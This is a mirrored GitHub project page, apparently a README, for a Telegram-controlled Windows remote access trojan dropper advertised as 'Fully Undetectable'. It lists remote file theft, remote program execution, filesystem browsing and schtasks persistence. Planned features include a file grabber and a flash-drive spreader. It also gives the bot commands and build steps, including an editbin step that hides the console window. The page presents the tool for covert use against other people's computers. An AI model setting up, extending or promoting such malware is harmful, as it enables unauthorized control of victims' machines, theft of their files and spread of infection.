项目作者: BigO-Moha

项目描述 :
Fully Undetectable telegram Rat dropper
高级语言: Dart
项目地址: git://github.com/BigO-Moha/Telegram-DropperRat.git
创建时间: 2020-11-12T08:44:57Z
项目社区:https://github.com/BigO-Moha/Telegram-DropperRat

开源协议:

下载


file Dropper

Table of Contents

" class="reference-link">About

Windows file Dropper and (file Manager) using Telegram.
this program will allow yout to download and upload files to any windows computer without port forwarding useing telegram and also is Fully encrypted means (The data being exchanged cannot be spied upon using MITM tools).

" class="reference-link">Features

  • upload File
  • download File
  • excute .exe remotly
  • navigate File System
  • Great Perfomance (using Async/Await)
  • autoRun (Using schtasks)
  • Fud (Fully Undetectable)
  • multi client (program will genrate client id at first connection)
  • [Todo] automatic file Graber
  • [Todo] Spreader (re Infect Flash drives)

Prerequisites

Dart Sdk.

  1. use only in Windows platform.

Installing

go to https://dart.dev/get-dart#install.
install dart-SDK

" class="reference-link">Usage

  1. commands:
  2. *************** Note Evry Single Command Should be Seprated with Space ***************
  3. * /online {use this command to get all connected users and their IDs}.
  4. * /cd [path] [userID] {use This Command to change currunt dir }
  5. * /getUser [id] {
  6. use This command to get userName
  7. }
  8. * /getFile [filePath with Name] [userId] {
  9. use This Command to Get A file from Computer
  10. }
  11. * /pwd [userId] {
  12. get Current Working directory
  13. }
  14. * /run [programPath] [userID] {
  15. Execute Program remotly
  16. }

go to program Directory /source.

  • Change const.dart file line 6 with your Own telegram bot api.
  • Compile using [ dart2native bin/drop_it.dart -o bin/myApp.exe].
  • -* Note change your Const.dart programid to your compiled program Name.
  • use this command to hide console while app is running [editbin.exe /subsystem:windows {yourapp}.exe]

editbin.exe is apart of the microsoft Visual studio 2019 {if this is not working find it in Visual studio 2019 installed dir }

alt text